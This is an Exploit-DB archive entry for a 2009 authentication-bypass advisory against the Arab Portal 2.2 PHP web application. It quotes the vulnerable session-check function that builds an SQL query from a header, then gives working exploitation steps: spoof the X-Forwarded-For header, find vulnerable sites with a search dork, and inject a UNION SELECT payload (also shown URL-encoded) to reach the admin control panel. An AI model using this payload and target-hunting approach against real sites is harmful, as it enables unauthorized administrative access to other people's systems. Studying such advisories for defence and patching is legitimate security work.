Arab Portal 2.2 - Authentication Bypass

EDB-ID:

8828

CVE:

2009-4203

EDB Verified:

Author:

sniper code

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2009-05-29

Vulnerable App: 
# Script Name : Arab portal 2.2 Remote Auth SQL Bypass Vulnerabilitiy

# Script  home : http://www.arab-portal.info/arabportal_22.zip
# Exploit risk level : High
# Found By : RoMaNcYxHaCkEr  [RXH]        
# Written By : Sniper Code    [S.C.T - 443 ]
# Our home :  WwW.Sec-Code.CoM  [Security - Codes TeaM]   
+======================================================================================================================+

# Introduction About Vulne :

the Control Panel Is Depending on Session In MySQL Also By Cookies But by Default  it Is Session ...

See This Line 192 of this File [admin/aclass/admin_func.php]:

         $result  = $apt->query("SELECT sessIP from  rafia_admin_sess where  sessID='$sessID' and sessIP='$sessIP' and sess_TIME<'$expsess'");

When You Injected The Header To Get XPL SQL Injection By Simple Injected And Success The Login In This SQL Query

# Vulne Line 192 In File [admin/aclass/admin_func.php]: :

function is_login()
     {
         global $apt;
        
         $sessID  = $this->get_sessID();
         $sessIP  = $apt->ip;
         $expsess = $apt->time + $this->expsess;

         if($this->use_pre_ip == 1){$r_ip = explode('.',$sessIP); $sessIP = $r_ip[0].'.'.$r_ip[1].'.'.$r_ip[2];}

         $result  = $apt->query("SELECT sessIP from  rafia_admin_sess where  sessID='$sessID' and sessIP='$sessIP' and sess_TIME<'$expsess'");

         if ($apt->dbnumrows($result) > 0)
         {
                 $apt->query("update rafia_admin_sess set sess_TIME='".$apt->time."' where  sessID='$sessID'");
                return true;
         }
         else
         {
             return false;
         }
     }

we can exploit this . .

# and now the Exploit  is:

-First : Install This Tool :

https://addons.mozilla.org/en-US/firefox/addon/5948

it is [ X-Forwarded-For Spoofer tool]

You Can Inject Also Client-ip Also Is Infected In Header

-second : find site by using dork : plz use your mind ^_^

ok now Go To Admincp e.g. :

http://localhost/arabportal_22/admin/

http://sniper code/path/admin/

Then Write This Code In Tool [from Firefox ===> Tools====> X-Forwarded-for Spoofer]

put this code :
'/**/union/**/select/**/0/*

And  select Enable for tool . . .

Now Refresh Twice ..and you will be In admin Control Panel ^_^

I Am Tired For Written Exploit For This Bug ...

and You Can Code It,s . .

If You Have Problem With Magic_quat  in php version Encode To URL Like This :

%27%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%30%2F%2A

and also you will be in admin control panel. . . .
+================================================================================================================+

# Solution :

Protect The Admin cp By using Firewall Or Change The Login Manner :)

thats it . . .

[+]
done by :sniper code and rxh . .

[+] Greetz to :

           [»] The members in our home [  WwW.Sec-Code.CoM  - - ]
           [»] [Snake1095 - aLwHEeD - AlH7nOOtY - aB0-3tH4b T3rR0r - HXH - -]
           [»][MN9 - S4S-T3rr0r!sT -G0D-F4Th3r- SnIpEr_h - Cyb3R-1sT - siana - jiko - -]
           [+] [members of WwW.tryag.cc/cc - -]



-==========================================[ ViVa Crazy Coderz rxh - S.C.T ]====================================-

# milw0rm.com [2009-05-29]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services